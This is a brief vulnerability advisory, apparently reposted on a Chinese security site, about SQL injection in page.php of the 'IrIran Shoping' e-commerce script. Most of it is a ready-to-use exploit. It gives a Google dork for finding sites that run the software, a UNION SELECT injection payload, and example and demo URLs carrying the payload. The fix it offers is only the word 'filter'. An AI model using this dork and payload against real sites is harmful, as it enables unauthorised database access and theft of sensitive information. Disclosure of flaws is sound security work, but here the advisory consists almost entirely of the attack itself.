IrIran Shoping是一款在线电子商务系统,IrIran Shoping中的page.php存在SQL注入漏洞,可能导致敏感信息泄露。

[+]info:
~~~~~~~~~

[~] Title     : IrIran Shoping Script SQL Injection Vulnerability
[~] Author    : Net.Edit0r
[~] Vendor or Software Link  :
[~] Email     : Black.hat.tm@gmail.com
[~] Data  : 2011-03-29
[~] Google dork: "Powered by: IRIran.net"
[~] Category:  [Webapps]
[~] Tested on: [Linux /php]
[+]poc:
~~~~~~~~~

[~] Vulnerable File :
https://www.2cto.com/products/page.php?id=[SQL]
 
[~] ExploiT         :
-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--
 
[~] Example         :
https://www.2cto.com/products/page.php?id=-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--
 
[~] Demo            :
?id=-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--

修复:过滤